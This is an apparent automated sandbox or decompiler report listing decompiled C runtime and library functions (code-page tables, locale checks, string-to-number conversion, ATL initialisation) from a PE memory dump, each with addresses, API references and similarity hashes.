Uniqueness Score: -1.00%

Function 0041E900, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 132
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0041E900(char _a4) {
				signed int _v8;
				char _v264;
				char _v520;
				char _v776;
				char _v1800;
				char _v1814;
				struct _cpinfo _v1820;
				intOrPtr _v1824;
				signed char _v1828;
				void* __ebx;
				signed int _t63;
				void* _t67;
				signed char _t68;
				intOrPtr _t69;
				void* _t71;
				char _t72;
				char _t73;
				signed char _t74;
				signed int _t75;
				signed char _t88;
				signed int _t91;
				signed int _t92;
				void* _t93;
				char* _t94;
				signed int _t95;
				intOrPtr _t100;
				signed int _t102;

				_t63 =  *0x438070; // 0xf2c84916
				_v8 = _t63 ^ _t102;
				_t2 =  &_a4; // 0x41ee32
				_t100 =  *_t2;
				if(GetCPInfo( *(_t100 + 4),  &_v1820) == 0) {
					_t93 = _t100 + 0x119;
					_t88 = 0;
					_t67 = 0xffffff9f;
					_t68 = _t67 - _t93;
					__eflags = _t68;
					_v1828 = _t68;
					do {
						_t94 = _t93 + _t88;
						_t69 = _t68 + _t94;
						_v1824 = _t69;
						__eflags = _t69 + 0x20 - 0x19;
						if(_t69 + 0x20 > 0x19) {
							__eflags = _v1824 - 0x19;
							if(_v1824 > 0x19) {
								 *_t94 = 0;
							} else {
								_t71 = _t100 + _t88;
								_t57 = _t71 + 0x19;
								 *_t57 =  *(_t71 + 0x19) | 0x00000020;
								__eflags =  *_t57;
								_t59 = _t88 - 0x20; // -32
								_t72 = _t59;
								goto L24;
							}
						} else {
							 *(_t100 + _t88 + 0x19) =  *(_t100 + _t88 + 0x19) | 0x00000010;
							_t54 = _t88 + 0x20; // 0x20
							_t72 = _t54;
							L24:
							 *_t94 = _t72;
						}
						_t68 = _v1828;
						_t93 = _t100 + 0x119;
						_t88 = _t88 + 1;
						__eflags = _t88 - 0x100;
					} while (_t88 < 0x100);
				} else {
					_t73 = 0;
					do {
						 *((char*)(_t102 + _t73 - 0x104)) = _t73;
						_t73 = _t73 + 1;
					} while (_t73 < 0x100);
					_t74 = _v1814;
					_t91 =  &_v1814;
					_v264 = 0x20;
					while(1) {
						_t108 = _t74;
						if(_t74 == 0) {
							break;
						}
						_t95 =  *(_t91 + 1) & 0x000000ff;
						_t75 = _t74 & 0x000000ff;
						while(1) {
							__eflags = _t75 - _t95;
							if(_t75 > _t95) {
								break;
							}
							__eflags = _t75 - 0x100;
							if(_t75 < 0x100) {
								 *((char*)(_t102 + _t75 - 0x104)) = 0x20;
								_t75 = _t75 + 1;
								__eflags = _t75;
								continue;
							}
							break;
						}
						_t91 = _t91 + 2;
						__eflags = _t91;
						_t74 =  *_t91;
					}
					E0041C7F9(_t108, 0, 1,  &_v264, 0x100,  &_v1800,  *(_t100 + 4), 0);
					E0041BB55(0, _t108, 0,  *((intOrPtr*)(_t100 + 0x21c)), 0x100,  &_v264, 0x100,  &_v520, 0x100,  *(_t100 + 4), 0);
					E0041BB55(0, _t108, 0,  *((intOrPtr*)(_t100 + 0x21c)), 0x200,  &_v264, 0x100,  &_v776, 0x100,  *(_t100 + 4), 0);
					_t92 = 0;
					do {
						_t68 =  *(_t102 + _t92 * 2 - 0x704) & 0x0000ffff;
						if((_t68 & 0x00000001) == 0) {
							__eflags = _t68 & 0x00000002;
							if((_t68 & 0x00000002) == 0) {
								 *(_t100 + _t92 + 0x119) = 0;
							} else {
								_t37 = _t100 + _t92 + 0x19;
								 *_t37 =  *(_t100 + _t92 + 0x19) | 0x00000020;
								__eflags =  *_t37;
								_t68 =  *((intOrPtr*)(_t102 + _t92 - 0x304));
								goto L15;
							}
						} else {
							 *(_t100 + _t92 + 0x19) =  *(_t100 + _t92 + 0x19) | 0x00000010;
							_t68 =  *((intOrPtr*)(_t102 + _t92 - 0x204));
							L15:
							 *(_t100 + _t92 + 0x119) = _t68;
						}
						_t92 = _t92 + 1;
					} while (_t92 < 0x100);
				}
				E0040AEA8();
				return _t68;
			}

0x0041e90b
0x0041e912
0x0041e917
0x0041e917
0x0041e934
0x0041ea2c
0x0041ea32
0x0041ea34
0x0041ea35
0x0041ea35
0x0041ea37
0x0041ea3d
0x0041ea3d
0x0041ea3f
0x0041ea41
0x0041ea4a
0x0041ea4d
0x0041ea59
0x0041ea60
0x0041ea70
0x0041ea62
0x0041ea62
0x0041ea65
0x0041ea65
0x0041ea65
0x0041ea69
0x0041ea69
0x00000000
0x0041ea69
0x0041ea4f
0x0041ea4f
0x0041ea54
0x0041ea54
0x0041ea6c
0x0041ea6c
0x0041ea6c
0x0041ea72
0x0041ea78
0x0041ea7e
0x0041ea7f
0x0041ea7f
0x0041e93a
0x0041e93a
0x0041e93c
0x0041e93c
0x0041e943
0x0041e944
0x0041e948
0x0041e94e
0x0041e954
0x0041e97c
0x0041e97c
0x0041e97e
0x00000000
0x00000000
0x0041e95d
0x0041e961
0x0041e973
0x0041e973
0x0041e975
0x00000000
0x00000000
0x0041e966
0x0041e968
0x0041e96a
0x0041e972
0x0041e972
0x00000000
0x0041e972
0x00000000
0x0041e968
0x0041e977
0x0041e977
0x0041e97a
0x0041e97a
0x0041e996
0x0041e9b7
0x0041e9df
0x0041e9e7
0x0041e9e9
0x0041e9e9
0x0041e9f3
0x0041ea03
0x0041ea05
0x0041ea1c
0x0041ea07
0x0041ea07
0x0041ea07
0x0041ea07
0x0041ea0c
0x00000000
0x0041ea0c
0x0041e9f5
0x0041e9f5
0x0041e9fa
0x0041ea13
0x0041ea13
0x0041ea13
0x0041ea23
0x0041ea24
0x0041ea28
0x0041ea8b
0x0041ea93

APIs

GetCPInfo.KERNEL32(?,?,00000005,?,00000000), ref: 0041E925

Strings

2A, xrefs: 0041E917
, xrefs: 0041E96A

Memory Dump Source

Source File: 0000000D.00000002.365397192.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: Info
String ID: $2A
API String ID: 1807457897-94569364
Opcode ID: 8f87ee16b897d958fad441b582deebb4b618f0a9bc1d50f517e05affa13c633b
Instruction ID: cf66281cb015847f8715a2dfed76925f4d76c0e68e5996172e4e09b57b66ea1d
Opcode Fuzzy Hash: 8f87ee16b897d958fad441b582deebb4b618f0a9bc1d50f517e05affa13c633b
Instruction Fuzzy Hash: 98414E7450434C9BDF258F25CC84BF6BBB9EF45304F1404EEE98997142D239AA86CF65

Uniqueness

Uniqueness Score: -1.00%

Function 00420A7C, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 88
COMMON

Download Yara Rule

C-Code - Quality: 94%

			E00420A7C(void* __ecx, signed int _a4, intOrPtr _a8) {
				int _v8;
				int _t15;
				int _t16;
				signed int _t17;
				signed int _t23;
				signed int _t25;
				signed int _t26;
				signed int _t27;
				void* _t30;
				void* _t31;
				intOrPtr _t32;
				intOrPtr _t33;
				intOrPtr* _t36;
				intOrPtr* _t37;

				_push(__ecx);
				_t23 = _a4;
				if(_t23 == 0) {
					L21:
					_t15 = E0041A0B2(_t23, __eflags, _a8 + 0x250, 0x20001004,  &_v8, 2);
					__eflags = _t15;
					if(_t15 != 0) {
						_t16 = _v8;
						__eflags = _t16;
						if(_t16 == 0) {
							_t16 = GetACP();
						}
						L25:
						return _t16;
					}
					L22:
					_t16 = 0;
					goto L25;
				}
				_t17 = 0;
				if( *_t23 == 0) {
					goto L21;
				}
				_t36 = 0x42e1e0;
				_t25 = _t23;
				while(1) {
					_t30 =  *_t25;
					if(_t30 !=  *_t36) {
						break;
					}
					if(_t30 == 0) {
						L7:
						_t26 = _t17;
						L9:
						if(_t26 == 0) {
							goto L21;
						}
						_t37 = 0x42e1e8;
						_t27 = _t23;
						while(1) {
							_t31 =  *_t27;
							if(_t31 !=  *_t37) {
								break;
							}
							if(_t31 == 0) {
								L17:
								_t49 = _t17;
								if(_t17 != 0) {
									_t16 = E004183A8(_t23, _t23);
									goto L25;
								}
								if(E0041A0B2(_t23, _t49, _a8 + 0x250, 0x2000000b,  &_v8, 2) == 0) {
									goto L22;
								}
								_t16 = _v8;
								goto L25;
							}
							_t32 =  *((intOrPtr*)(_t27 + 2));
							if(_t32 !=  *((intOrPtr*)(_t37 + 2))) {
								break;
							}
							_t27 = _t27 + 4;
							_t37 = _t37 + 4;
							if(_t32 != 0) {
								continue;
							}
							goto L17;
						}
						asm("sbb eax, eax");
						_t17 = _t17 | 0x00000001;
						__eflags = _t17;
						goto L17;
					}
					_t33 =  *((intOrPtr*)(_t25 + 2));
					if(_t33 !=  *((intOrPtr*)(_t36 + 2))) {
						break;
					}
					_t25 = _t25 + 4;
					_t36 = _t36 + 4;
					if(_t33 != 0) {
						continue;
					}
					goto L7;
				}
				asm("sbb edx, edx");
				_t26 = _t25 | 0x00000001;
				__eflags = _t26;
				goto L9;
			}

0x00420a81
0x00420a82
0x00420a89
0x00420b2f
0x00420b43
0x00420b48
0x00420b4a
0x00420b50
0x00420b53
0x00420b55
0x00420b57
0x00420b57
0x00420b5d
0x00420b62
0x00420b62
0x00420b4c
0x00420b4c
0x00000000
0x00420b4c
0x00420a8f
0x00420a94
0x00000000
0x00000000
0x00420a9a
0x00420a9f
0x00420aa1
0x00420aa1
0x00420aa7
0x00000000
0x00000000
0x00420aac
0x00420ac3
0x00420ac3
0x00420acc
0x00420ace
0x00000000
0x00000000
0x00420ad0
0x00420ad5
0x00420ad7
0x00420ad7
0x00420add
0x00000000
0x00000000
0x00420ae2
0x00420b00
0x00420b00
0x00420b02
0x00420b27
0x00000000
0x00420b2c
0x00420b1f
0x00000000
0x00000000
0x00420b21
0x00000000
0x00420b21
0x00420ae4
0x00420aec
0x00000000
0x00000000
0x00420aee
0x00420af1
0x00420af7
0x00000000
0x00000000
0x00000000
0x00420af9
0x00420afb
0x00420afd
0x00420afd
0x00000000
0x00420afd
0x00420aae
0x00420ab6
0x00000000
0x00000000
0x00420ab8
0x00420abb
0x00420ac1
0x00000000
0x00000000
0x00000000
0x00420ac1
0x00420ac7
0x00420ac9
0x00420ac9
0x00000000

APIs

GetACP.KERNEL32(?,20001004,?,00000002,00000000,00000050,00000050,?,00420CD7,?,00000050,?,?,?,?,?), ref: 00420B57

Strings

ACP, xrefs: 00420A9A
OCP, xrefs: 00420AD0

Memory Dump Source

Source File: 0000000D.00000002.365397192.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID:
String ID: ACP$OCP
API String ID: 0-711371036
Opcode ID: d2aaff05ab7c8b55bab6faa7aef3284fa1c13c2e86f80466cf7454f3ea340c9e
Instruction ID: caef75d8467bf1920918d86d37c7e59b662862f20c903f2cecfd3e438e98227a
Opcode Fuzzy Hash: d2aaff05ab7c8b55bab6faa7aef3284fa1c13c2e86f80466cf7454f3ea340c9e
Instruction Fuzzy Hash: 03212B22B01225A6D7348B94E901BA777E69FA4B54FD68076E909D7302EB3AED40C35C

Uniqueness

Uniqueness Score: -1.00%

Function 004052E9, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 77
COMMON

Download Yara Rule

C-Code - Quality: 67%

			E004052E9(void* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags, void* __fp0) {
				void* _t34;
				void* _t38;
				void* _t45;
				intOrPtr* _t46;
				signed int* _t55;
				void* _t61;
				void* _t65;
				intOrPtr _t68;
				signed short _t70;
				void* _t72;
				void* _t79;

				_t79 = __eflags;
				_t61 = __edx;
				E00424FAC(E00426204, __ecx, __edi, __esi, _t72, __fp0);
				 *(_t72 - 0x10) =  *(_t72 - 0x10) & 0x00000000;
				_push(__esi);
				_t68 =  *((intOrPtr*)(_t72 + 0x1c));
				_push(__edi);
				_push(_t72 - 0x18);
				_t34 = E00402207(_t68, _t68);
				 *(_t72 - 4) =  *(_t72 - 4) & 0x00000000;
				_push(_t34);
				_push( *((intOrPtr*)(_t68 + 0x14)));
				_push(_t72 + 0x14);
				_push(_t72 + 0xc);
				_push(_t72 - 0x38);
				_push(__ecx);
				_t38 = E004069F8(_t68, _t61, __ecx, _t68, _t79, __fp0);
				 *(_t72 - 4) =  *(_t72 - 4) | 0xffffffff;
				E004016CC(_t72 - 0x18);
				_t65 =  !=  ? _t72 - 0x38 : _t72 - 0x37;
				_t70 = E00408FC1(_t65, _t72 + 0x1c, _t38, _t72 - 0x10);
				_t45 = E00408646(_t72 + 0xc, _t72 + 0x14);
				_t55 =  *(_t72 + 0x20);
				if(_t45 != 0) {
					 *_t55 =  *_t55 | 0x00000001;
				}
				if( *((intOrPtr*)(_t72 + 0x1c)) == _t65 ||  *(_t72 - 0x10) != 0 || _t70 > 0xffff) {
					 *_t55 =  *_t55 | 0x00000002;
					__eflags =  *_t55;
				} else {
					_t60 =  ==  ?  ~_t70 & 0x0000ffff : _t70 & 0x0000ffff;
					 *((short*)( *((intOrPtr*)(_t72 + 0x24)))) =  ==  ?  ~_t70 & 0x0000ffff : _t70 & 0x0000ffff;
				}
				_t46 =  *((intOrPtr*)(_t72 + 8));
				 *_t46 =  *((intOrPtr*)(_t72 + 0xc));
				 *((intOrPtr*)(_t46 + 4)) =  *((intOrPtr*)(_t72 + 0x10));
				 *[fs:0x0] =  *((intOrPtr*)(_t72 - 0xc));
				return _t46;
			}

0x004052e9
0x004052e9
0x004052ee
0x004052f6
0x004052fd
0x004052fe
0x00405301
0x00405306
0x00405307
0x0040530c
0x00405310
0x00405311
0x00405317
0x0040531b
0x0040531f
0x00405320
0x00405321
0x0040532b
0x00405332
0x00405341
0x00405359
0x0040535f
0x00405364
0x00405369
0x0040536b
0x0040536b
0x00405371
0x0040539a
0x0040539a
0x00405381
0x0040538f
0x00405395
0x00405395
0x0040539d
0x004053a5
0x004053aa
0x004053b0
0x004053ba

APIs

__EH_prolog.LIBCMT ref: 004052EE

Part of subcall function 00402207: __EH_prolog.LIBCMT ref: 0040220C

Part of subcall function 004069F8: __EH_prolog.LIBCMT ref: 004069FD

__Stoulx.LIBCPMT ref: 0040534E

Strings

-, xrefs: 00405388

Memory Dump Source

Source File: 0000000D.00000002.365397192.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: H_prolog$Stoulx
String ID: -
API String ID: 2615900380-2547889144
Opcode ID: 273a2288a2726bb5f29afe39d0bae8f1d6c2923884f3030ac134b1f9ec57cdfc
Instruction ID: 26ff588704d2b28c897f02a6728dfa57ee461c0f70e5c4bd547ccd8fdd7afbde
Opcode Fuzzy Hash: 273a2288a2726bb5f29afe39d0bae8f1d6c2923884f3030ac134b1f9ec57cdfc
Instruction Fuzzy Hash: 1921A0B2900119EBCB14DFA4D881AFF77B8EF45314F01456FF815A3280E7789A05CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 00405224, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 73
COMMON

Download Yara Rule

C-Code - Quality: 67%

			E00405224(void* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags, void* __fp0) {
				void* _t34;
				void* _t38;
				void* _t45;
				intOrPtr* _t46;
				signed int* _t54;
				void* _t58;
				void* _t62;
				intOrPtr _t65;
				signed int _t67;
				void* _t70;
				void* _t77;

				_t77 = __eflags;
				_t58 = __edx;
				E00424FAC(E00426204, __ecx, __edi, __esi, _t70, __fp0);
				 *(_t70 - 0x10) =  *(_t70 - 0x10) & 0x00000000;
				_push(__esi);
				_t65 =  *((intOrPtr*)(_t70 + 0x1c));
				_push(__edi);
				_push(_t70 - 0x18);
				_t34 = E00402207(_t65, _t65);
				 *(_t70 - 4) =  *(_t70 - 4) & 0x00000000;
				_push(_t34);
				_push( *((intOrPtr*)(_t65 + 0x14)));
				_push(_t70 + 0x14);
				_push(_t70 + 0xc);
				_push(_t70 - 0x38);
				_push(__ecx);
				_t38 = E004069F8(_t65, _t58, __ecx, _t65, _t77, __fp0);
				 *(_t70 - 4) =  *(_t70 - 4) | 0xffffffff;
				E004016CC(_t70 - 0x18);
				_t62 =  !=  ? _t70 - 0x38 : _t70 - 0x37;
				_t67 = E00408FC1(_t62, _t70 + 0x1c, _t38, _t70 - 0x10);
				_t45 = E00408646(_t70 + 0xc, _t70 + 0x14);
				_t54 =  *(_t70 + 0x20);
				if(_t45 != 0) {
					 *_t54 =  *_t54 | 0x00000001;
				}
				if( *((intOrPtr*)(_t70 + 0x1c)) == _t62 ||  *(_t70 - 0x10) != 0) {
					 *_t54 =  *_t54 | 0x00000002;
					__eflags =  *_t54;
				} else {
					_t69 =  ==  ?  ~_t67 : _t67;
					 *((intOrPtr*)( *((intOrPtr*)(_t70 + 0x24)))) =  ==  ?  ~_t67 : _t67;
				}
				_t46 =  *((intOrPtr*)(_t70 + 8));
				 *_t46 =  *((intOrPtr*)(_t70 + 0xc));
				 *((intOrPtr*)(_t46 + 4)) =  *((intOrPtr*)(_t70 + 0x10));
				 *[fs:0x0] =  *((intOrPtr*)(_t70 - 0xc));
				return _t46;
			}

0x00405224
0x00405224
0x00405229
0x00405231
0x00405238
0x00405239
0x0040523c
0x00405241
0x00405242
0x00405247
0x0040524b
0x0040524c
0x00405252
0x00405256
0x0040525a
0x0040525b
0x0040525c
0x00405266
0x0040526d
0x0040527c
0x00405294
0x0040529a
0x0040529f
0x004052a4
0x004052a6
0x004052a6
0x004052ac
0x004052c6
0x004052c6
0x004052b4
0x004052bc
0x004052c2
0x004052c2
0x004052c9
0x004052d1
0x004052d6
0x004052dc
0x004052e6

APIs

__EH_prolog.LIBCMT ref: 00405229

Part of subcall function 00402207: __EH_prolog.LIBCMT ref: 0040220C

Part of subcall function 004069F8: __EH_prolog.LIBCMT ref: 004069FD

__Stoulx.LIBCPMT ref: 00405289

Strings

-, xrefs: 004052B8

Memory Dump Source

Source File: 0000000D.00000002.365397192.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: H_prolog$Stoulx
String ID: -
API String ID: 2615900380-2547889144
Opcode ID: 499f4694592ecfe37ce03497206efd00b010d3af3183e194ead24725b7ba8421
Instruction ID: c45324f8a7067ed54b169cc5f17ce1492fc833454c53b9a05465bc24947a727d
Opcode Fuzzy Hash: 499f4694592ecfe37ce03497206efd00b010d3af3183e194ead24725b7ba8421
Instruction Fuzzy Hash: D4215CB290021DABCB10DF94D941AEE7BB8EF49314F0145AEF815A3281D738AA15CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 00408681, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 50
COMMON

Download Yara Rule

C-Code - Quality: 86%

			E00408681(void* __ecx, void* __edx, void* __edi, void* __esi, void* __fp0) {
				void* _t19;
				void* _t37;
				intOrPtr* _t39;
				intOrPtr* _t42;
				void* _t44;

				_t37 = __edx;
				E00424FAC(E00426438, __ecx, __edi, __esi, _t44, __fp0);
				_push(__edi);
				 *((intOrPtr*)(_t44 - 0x10)) = 0;
				_t39 =  *((intOrPtr*)(_t44 + 8));
				if(_t39 != 0) {
					_t50 =  *_t39;
					if( *_t39 == 0) {
						_push(__esi);
						_t42 = E0040A85C(__ecx, _t37, _t50, 8);
						 *((intOrPtr*)(_t44 + 8)) = _t42;
						 *(_t44 - 4) = 0;
						E0040141C(_t44 - 0x44, _t37, _t39, _t42, __fp0, E0040170A( *((intOrPtr*)(_t44 + 0xc))));
						 *(_t44 - 4) = 1;
						_push(0);
						 *((intOrPtr*)(_t44 - 0x10)) = 1;
						E004017AE(_t42);
						 *(_t44 - 4) = 2;
						 *_t42 = 0x4274b8;
						 *(_t44 - 4) = 3;
						 *_t39 = _t42;
						 *(_t44 - 4) =  *(_t44 - 4) | 0xffffffff;
						 *((intOrPtr*)(_t44 - 0x10)) = 1;
						 *((intOrPtr*)(_t44 - 0x10)) = 0;
						E004014CD(_t44 - 0x44);
					}
				}
				_t19 = 2;
				 *[fs:0x0] =  *((intOrPtr*)(_t44 - 0xc));
				return _t19;
			}

0x00408681
0x00408686
0x00408691
0x00408692
0x00408695
0x0040869a
0x0040869c
0x0040869e
0x004086a0
0x004086a8
0x004086ab
0x004086ae
0x004086bd
0x004086c3
0x004086c8
0x004086ca
0x004086cd
0x004086d2
0x004086d9
0x004086df
0x004086e6
0x004086e8
0x004086ef
0x004086f5
0x004086f8
0x004086fd
0x0040869e
0x00408703
0x00408706
0x00408710

APIs

__EH_prolog.LIBCMT ref: 00408686
new.LIBCMT ref: 004086A3

Part of subcall function 0040141C: __EH_prolog.LIBCMT ref: 00401421
Part of subcall function 0040141C: std::_Lockit::_Lockit.LIBCPMT ref: 00401433
Part of subcall function 0040141C: std::exception::exception.LIBCONCRT ref: 00401488
Part of subcall function 0040141C: __CxxThrowException@8.LIBVCRUNTIME ref: 004014A5
Part of subcall function 0040141C: std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 004014AE

Part of subcall function 004017AE: __EH_prolog.LIBCMT ref: 004017B3

Part of subcall function 004014CD: std::_Locinfo::_Locinfo_dtor.LIBCPMT ref: 004014F5
Part of subcall function 004014CD: std::_Lockit::~_Lockit.LIBCPMT ref: 00401581

Strings

Ub@, xrefs: 004086D9

Memory Dump Source

Source File: 0000000D.00000002.365397192.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: std::_$H_prolog$Locinfo::_Lockit$Exception@8Locinfo_ctorLocinfo_dtorLockit::_Lockit::~_Throwstd::exception::exception
String ID: Ub@
API String ID: 3909326606-3022093820
Opcode ID: 465b94012f70fa4e5cb8951059418225a6d2a0e015d8061b69369b720b6fd045
Instruction ID: fb9d43de0333d1f4b614fc4d4a7fff408529d5cf859c6173f918d75a7a5c5165
Opcode Fuzzy Hash: 465b94012f70fa4e5cb8951059418225a6d2a0e015d8061b69369b720b6fd045
Instruction Fuzzy Hash: A3118271D002199BCB10EF99D98169DFB74FF80314F60826FE459672D1CB780A00CB98

Uniqueness

Uniqueness Score: -1.00%

Function 0041A23B, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 35
COMMON

Download Yara Rule

C-Code - Quality: 48%

			E0041A23B(void* __ecx, void* __eflags, char _a4) {
				signed int _v8;
				signed int _t5;
				int _t9;
				intOrPtr* _t16;
				signed int _t18;

				_t11 = __ecx;
				_push(__ecx);
				_t5 =  *0x438070; // 0xf2c84916
				_v8 = _t5 ^ _t18;
				_t16 = E00419DD3(0x15, "IsValidLocaleName", 0x42d01c, "IsValidLocaleName");
				if(_t16 == 0) {
					_t3 =  &_a4; // 0x417126
					_t9 = IsValidLocale(E0041A390(_t11, __eflags,  *_t3, 0), 1);
				} else {
					_t2 =  &_a4; // 0x417126
					 *0x427198( *_t2);
					_t9 =  *_t16();
				}
				E0040AEA8();
				return _t9;
			}

0x0041a23b
0x0041a240
0x0041a241
0x0041a248
0x0041a262
0x0041a269
0x0041a27e
0x0041a287
0x0041a26b
0x0041a26b
0x0041a270
0x0041a276
0x0041a276
0x0041a293
0x0041a29b

APIs

IsValidLocale.KERNEL32(00000000,&qA,00000000,00000001,?,?,00417126,?,?,00416B06,?,00000006), ref: 0041A287

Strings

IsValidLocaleName, xrefs: 0041A24C, 0041A256
&qA, xrefs: 0041A27E, 0041A26B

Memory Dump Source

Source File: 0000000D.00000002.365397192.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: LocaleValid
String ID: &qA$IsValidLocaleName
API String ID: 1901932003-1967693340
Opcode ID: 2abad42261349e6c04116b512554345bacd92de350be52ee33bfb07962e266ae
Instruction ID: c63523d53a510b5973ff36e40628d3e21fcfaf7979d80098c6844ff2188591fd
Opcode Fuzzy Hash: 2abad42261349e6c04116b512554345bacd92de350be52ee33bfb07962e266ae
Instruction Fuzzy Hash: B4F0E930B42318B7CB206F61AC06FAEBB94DF58714F50016AF90566391CE799D6255CE

Uniqueness

Uniqueness Score: -1.00%

Function 004080E3, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 34
COMMON

Download Yara Rule

C-Code - Quality: 57%

			E004080E3(short* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags, void* __fp0) {
				void* _t13;
				void* _t14;
				void* _t18;
				void* _t23;
				short* _t25;
				void* _t30;
				void* _t33;

				_t33 = __eflags;
				_t23 = __edx;
				E00424FAC(E00425E85, __ecx, __edi, __esi, _t30, __fp0);
				_push(__ecx);
				_push(__ecx);
				_push(__esi);
				_push(__edi);
				_t25 = __ecx;
				 *((intOrPtr*)(_t30 - 0x14)) = __ecx;
				 *(_t30 - 0x10) =  *(_t30 - 0x10) & 0x00000000;
				_t13 = E00401212(L".exe");
				_pop(_t18);
				_push(_t13);
				_t14 = E004088D7(_t23, _t23, _t33, __fp0, _t18);
				 *(_t25 + 0x10) =  *(_t25 + 0x10) & 0x00000000;
				 *((intOrPtr*)(_t25 + 0x14)) = 7;
				 *_t25 = 0;
				E004058E4(_t25, _t14);
				 *(_t30 - 4) =  *(_t30 - 4) & 0x00000000;
				 *(_t30 - 0x10) = 1;
				 *[fs:0x0] =  *((intOrPtr*)(_t30 - 0xc));
				return _t25;
			}

0x004080e3
0x004080e3
0x004080e8
0x004080ed
0x004080ee
0x004080ef
0x004080f0
0x004080f1
0x004080f5
0x004080f8
0x00408101
0x00408106
0x00408107
0x0040810b
0x00408110
0x00408116
0x0040811d
0x00408123
0x00408128
0x0040812f
0x0040813a
0x00408144

APIs

__EH_prolog.LIBCMT ref: 004080E8
char_traits.LIBCPMT ref: 00408101

Strings

.exe, xrefs: 004080FC, 00408108

Memory Dump Source

Source File: 0000000D.00000002.365397192.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: H_prologchar_traits
String ID: .exe
API String ID: 734123105-4119554291
Opcode ID: 298697d7e3b6c3c56ffe1bf8cdf2de9f0cfca750d13799f567cbb18d03be660a
Instruction ID: e7e4bcbc12dd530a86f76d28f1ea6607bf8afe2e7fb04f668d93976c0de532e3
Opcode Fuzzy Hash: 298697d7e3b6c3c56ffe1bf8cdf2de9f0cfca750d13799f567cbb18d03be660a
Instruction Fuzzy Hash: 2FF0BBB1B14515ABD708AF55E90977FB7B8EFC4319F10421FF408E3280CBB8190486A8

Uniqueness

Uniqueness Score: -1.00%

Function 00409731, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 26
COMMON

Download Yara Rule

C-Code - Quality: 93%

			E00409731(void* __ecx, char _a4) {
				char _v8;
				intOrPtr _t16;
				signed int _t17;
				signed int _t19;
				intOrPtr _t22;
				signed int _t24;

				_push(__ecx);
				E00409149( &_v8, 2);
				_t2 =  &_a4; // 0x435f60
				_t22 =  *_t2;
				 *(_t22 + 8) = 1;
				while(1) {
					_t24 =  *(_t22 + 8);
					_t16 =  *((intOrPtr*)(0x4391d4 + _t24 * 4));
					if(_t16 == 0 || _t16 == _t22) {
						break;
					}
					_t7 = _t24 + 1; // 0x2
					_t19 = _t7;
					 *(_t22 + 8) = _t19;
					if(_t19 < 8) {
						continue;
					}
					break;
				}
				_t17 =  *(_t22 + 8);
				 *((char*)(_t17 + 0x4391fc)) =  *((char*)(_t17 + 0x4391fc)) + 1;
				 *((intOrPtr*)(0x4391d4 + _t17 * 4)) = _t22;
				return E004091A1( &_v8);
			}

0x00409734
0x0040973a
0x0040973f
0x0040973f
0x00409742
0x00409749
0x00409749
0x0040974c
0x00409755
0x00000000
0x00000000
0x0040975b
0x0040975b
0x0040975e
0x00409764
0x00000000
0x00000000
0x00000000
0x00409764
0x00409766
0x00409769
0x0040976f
0x00409781

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 0040973A
std::_Lockit::~_Lockit.LIBCPMT ref: 00409779

Strings

`_C, xrefs: 0040973F

Memory Dump Source

Source File: 0000000D.00000002.365397192.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: Lockitstd::_$Lockit::_Lockit::~_
String ID: `_C
API String ID: 593203224-1700807555
Opcode ID: 3582231eec14387917242468efe7c0a42c895337fc29f2c16dad6276a70e48ed
Instruction ID: 004b7e4fac5d86d8572e964ad68b2ac62ec4d58587825e95364a59b40602d07d
Opcode Fuzzy Hash: 3582231eec14387917242468efe7c0a42c895337fc29f2c16dad6276a70e48ed
Instruction Fuzzy Hash: 33F0823020010ADBEB04DF52D989965B765EB01308B2882AED809AB3C3D777ED42C744

Uniqueness

Uniqueness Score: -1.00%

Function 00408DAA, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 22
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00408DAA(intOrPtr* __ecx, void* __eflags) {
				intOrPtr* _t13;

				_t13 = __ecx;
				E00408DFD(__ecx);
				 *__ecx = 0x38;
				_t1 = _t13 + 0x14; // 0x438ffc
				 *((intOrPtr*)(__ecx + 8)) = 0x400000;
				 *((intOrPtr*)(__ecx + 4)) = 0x400000;
				 *((intOrPtr*)(__ecx + 0xc)) = 0xe00;
				 *((intOrPtr*)(__ecx + 0x10)) = 0x427220;
				if(E0040113B(0x400000, _t1) < 0) {
					if(IsDebuggerPresent() != 0) {
						OutputDebugStringW(L"ERROR : Unable to initialize critical section in CAtlBaseModule\n");
					}
					 *0x439e80 = 1;
				}
				return _t13;
			}

0x00408dab
0x00408dad
0x00408db7
0x00408dbd
0x00408dc0
0x00408dc3
0x00408dc6
0x00408dcd
0x00408ddb
0x00408de5
0x00408dec
0x00408dec
0x00408df2
0x00408df2
0x00408dfc

APIs

Part of subcall function 0040113B: InitializeCriticalSectionEx.KERNEL32(00438FFC,00000000,00000000,00438FE8,00408DD9,?,?,?,00401030), ref: 00401141
Part of subcall function 0040113B: GetLastError.KERNEL32(?,?,?,00401030), ref: 0040114B

IsDebuggerPresent.KERNEL32(?,?,?,00401030), ref: 00408DDD
OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,00401030), ref: 00408DEC

Strings

